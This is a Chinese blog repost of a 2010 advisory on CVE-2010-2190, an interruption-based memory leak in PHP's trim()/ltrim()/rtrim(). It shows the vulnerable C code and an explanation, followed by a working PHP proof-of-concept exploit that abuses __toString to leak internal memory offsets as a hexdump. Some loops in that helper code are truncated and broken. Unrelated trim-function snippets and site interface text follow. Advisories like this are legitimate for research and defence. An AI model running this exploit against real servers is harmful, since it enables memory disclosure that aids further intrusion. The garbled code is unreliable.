strim php,PHP trim()/ltrim()/rtrim()函数中断信息泄露漏洞

最新推荐文章于 2022-12-14 21:50:13 发布
最新推荐文章于 2022-12-14 21:50:13 发布
阅读量237 收藏
点赞数
文章标签: strim php

发布日期:2010-05-30

更新日期:2010-06-13

受影响系统:

PHP PHP <= 5.3.2

PHP PHP <= 5.2.13

描述:

--------------------------------------------------------------------------------

CVE ID: CVE-2010-2190

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的trim()、ltrim()、rtrim()函数中存在信息泄露漏洞:

static void php_do_trim(INTERNAL_FUNCTION_PARAMETERS, int mode)

{

char *str;

char *what = NULL;

int str_len, what_len = 0;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|s", &str, &str_len, &what, &what_len) == FAILURE) {

return;

}

php_trim(str, str_len, what, what_len, return_value, mode TSRMLS_CC);

}

zend_parse_parameters()函数最多将2个字符串参数检索到了本地变量,放松了这些变量与原始ZVAL之间的联系。问题是在原始ZVAL被中断修改的情况下,字符串指针会指向已释放的或重用的内存。这种情况下的中断攻击也比较容易,因为zend_parse_parameters()支持对象的__toString()方式。攻击者只需以strtok()第二个参数的形式传送对象,由于call time pass by reference功能,之后攻击者可以从__toString()方式杀死第一个字符串参数,并重用于哈希表。这会导致php_trim()作用于哈希表的内存而不是字符串的内存,允许攻击者泄露重要的内部内存偏移。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

class dummy

{

function __toString()

{

/* now the magic */

parse_str("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=1", $GLOBALS['var']);

return "Z-A";

}

}

/* Detect 32 vs 64 bit */

$i = 0x7fffffff;

$i++;

if (is_float($i)) {

$GLOBALS['var'] = str_repeat("A", 39);

} else {

$GLOBALS['var'] = str_repeat("A", 67);

}

/* Trigger the Code */

$x = trim(&$GLOBALS['var'], new dummy());

hexdump($x);

/* Helper function */

function hexdump($x)

{

$l = strlen($x);

$p = 0;

echo "Hexdump\n";

echo "-------\n";

while ($l > 16) {

echo sprintf("%08x: ",$p);

for ($i=0; $i<16; $i++) {

echo sprintf("%02X ", ord($x[$p+$i]));

}

echo "  ";

for ($i=0; $i<16; $i++) {

$c = ord($x[$p+$i]);

echo ($c < 32 || $c > 127) ? '.' : chr($c);

}

$l-=16;

$p+=16;

echo "\n";

}

if ($l > 0)

echo sprintf("%08x: ",$p);

for ($i=0; $i

echo sprintf("%02X ", ord($x[$p+$i]));

}

for ($i=0; $i<16-$l; $i++) { echo "-- "; }

echo "  ";

for ($i=0; $i

$c = ord($x[$p+$i]);

echo ($c < 32 || $c > 127) ? '.' : chr($c);

}

echo "\n";

}

?>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

尚庆铭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java中string.trim()函数的作用实例及
08-28
java中string.trim()函数的作用实例及源码 Java 中的 String.trim() 函数是一个非常常用的方法,它可以将字符串两端的空格删除,以便于字符串的处理和比较。下面我们来详细介绍 String.trim() 函数的作用实例及源码...
strim:STRIM(string) 是 MATLAB 函数 DEBLANK 的扩展。-matlab开发
05-30
今天我们要探讨的是一个名为`strim`的函数,它是MATLAB内置函数`deblank`的一个扩展。`strim`的功能是在给定的字符串中移除前导和尾随的空白字符,这包括空格、制表符(tab)和其他不可见的空白字符。 `deblank`...
最近发现一个php trim的bug
weixin_30600503的博客
11-17 238
trim 排除字符串两边的 “、”;你会发现“耀、”会出现编码错误问题,导致程序出现错误!代码如下: $a = "王者荣耀、"; echo trim($a,"、"); 结果: 备注:各位要使用trim排除中文字符请慎用! 转载于:https://www.cnblogs.com/zwb121/p/7850107.html...
php 删除空格strim,php中ltrim()、rtrim()与trim()删除字符空格实例
weixin_39813009的博客
04-01 165
本文实例讲述了php中ltrim()、rtrim()与trim()删除字符空格的方法。分享给大家供大家参考。具体分析如下:php中的trim函数不能像asp中的一样,可以自动删除所有空格,PHP专业提供了 rtrim() trim()函数,对此感兴趣的朋友可以参考一下。PHP实例代码如下:复制代码 代码如下:$str=" 去除前后空格 ";echo "方括号中为原始字符串:[".$str."]";...
phptrim函数遇到的问题
u014433030的专栏
07-06 640
问题一: 看如下代码 <?php $val = true; var_dump(trim($val)); //string '1' (length=1) $val = false; var_dump(trim($val)); //string '' (length=0) trim函数直接将bool类型的变量变成了string类型: true -->  '1'
php’s trim() 函数
weixin_34248118的博客
04-20 79
trim() 函数从字符串的两端删除空白字符和其他预定义字符。 trim(string,charlist) 原文 http://www.w3school.com.cn/php/func_string_trim.asp
phptrim ltrim rtrim 小坑
Dafei4的博客
11-05 611
trim, ltrim, rtrim , 有第二个参数,可以指定过滤的字符 小坑demo: //ltrim区分左边的 间隔就是右边第一个字符, 这样写没有可读性 $str = "qwertyuiop"; $bbb = ltrim($str,'qpwoei'); $ccc = ltrim($str,'qprwoei'); $ddd = ltrim($str,'qaaaaaaaaaw'); $e...
matlab开发-strim
08-26
"strim"这个工具就是一个专门为处理字符串设计的函数,它是MATLAB内置函数`deblank`的一个拓展。这篇文章将详细解析`strim`的使用及其与`deblank`的区别,并结合实际案例探讨其在MATLAB开发中的应用。 首先,我们来...
唐荣锡:CAD产业发展的回顾与思考(全文整理完)
04-05
* 1998 年,达索接管法国马特拉( MATRA)下属的 CAD/CAM 业务,包括 Euclid/ styler,Machinist,Cisigraph/ Strim100 和 StrimFlow 等。 * 1999 年,达索收购 Smartsolutions 的 SmarTeam 业务。 * 1999 年,达索向...
1C Backaper-开源
05-01
1. `STRIM_Pr.bat`:这可能是一个批处理文件,用于执行特定的命令行操作,如启动备份过程。 2. `c1cback.conf`:配置文件,用于设置备份参数,如备份路径、时间、用户踢出逻辑等。 3. `upx.exe`:UPX是一个流行的可...
php trim 乱码,php trim方法的使用会导致的问题分析
weixin_42128315的博客
04-12 128
本篇文章给大家带来的内容是关于php trim方法的使用会导致的问题分析,有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。场景php中的截取字符串前后字符包括有:ltrim,rtrim,trim三个方法下面的例子中只以ltrim方法做举例在我之前的认知中(当然我很水,从没看过这块源码),如果我想要删除字符串左边的空字符串,空制表符之类的,那么我就直接使用ltrim($str)即可如果...
php函数ltrim疑点备注
黑白相间...
11-21 316
测试代码如下 $str2 = '[ahao:tools:[{&amp;quot;name&amp;quot;:&amp;quot;ahao&amp;quot;,&amp;quot;age&amp;quot;:20}]}'; echo &amp;quot;[ahao.tools:[{---------&amp;quot; . ltrim($str2,'[ahao.tools:[{'); echo &amp
PHP trim函数详解
rain的博客
12-14 1595
PHP trim函数详解
trim 函数
qq_33646504的博客
04-03 5334
trim 函数 只去除两端的空格,不去除中间空格 var str = ’ xiao ming '; var str1 = str.trim(); console.log(str1)//xiao ming ## 生成一个适合你的列表 - 项目 - 项目 - 项目 1. 项目1 2. 项目2 3. 项目3 - [ ] 计划任务 - [x] 完成任务 ## 创建一个表格 ...
MYsql的length的函数 strim
07-24 759
MYsql的length的函数 ,utf-8 的时候中文 一个字 length 返回的3 SELECT LENGTH( TRIM( attr_value ) ) , attr_value FROM `ecs_attribute_line_all` WHERE LENGTH( TRIM( attr_value ) ) >8 LIMIT 0 , 30
php trim()函数
Aspire
07-07 3753
php trim()函数 trim()函数trim() 函数移除字符串两侧的空白字符或其他预定义字符。 相关函数:ltrim(),移除字符串左侧的空白字符或其他预定义字符。 rtrim(),移除字符串右侧的空白字符或其他预定义字符。 语法:trim(string,charlist) 如果没有trim()函数没有charlist参数,则移除以下所有字符: ...
实现strim相同功能的函数
a1234567mdy的专栏
11-21 362
def trim(s): flag = 0 if(s[0:1] == " "): flag =1 s = s[1:] if (s[-1:] == " "): flag =1 s = s[0:-1] if(flag == 0): return s else: re...
strim的使用
ibogood的专栏
07-11 2228
PHP获取的GET或POST参数可能都需要过滤下,所以封装一下
PHP代码审计之函数漏洞(上)
JBlock的博客
03-13 5443
前言 此篇文件属于代码审计篇的一个环节,其意图是为总结php常见函数漏洞分为上下两节,此为上节!此篇与命令注入绕过篇和sql注入回顾篇同属一个系列!欢迎各位斧正! 文章目录前言正文intval()使用不当导致安全漏洞的分析switch()in_array()PHP弱类型的特性&quot;.&quot;被替换成&quot;_&quot;unsetserialize 和 unserialize漏洞session 反序列化漏洞MD5 comp...
java strim()
最新发布
07-27
Java中的`trim()`方法用于去除字符串两端的空格或空白字符。它返回一个新的字符串,其中包含原始字符串去除两端格后的内容。`trim()`方法会修改原始字符串,而是返回一个新的字符串。 以下是一个示例: ```java ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值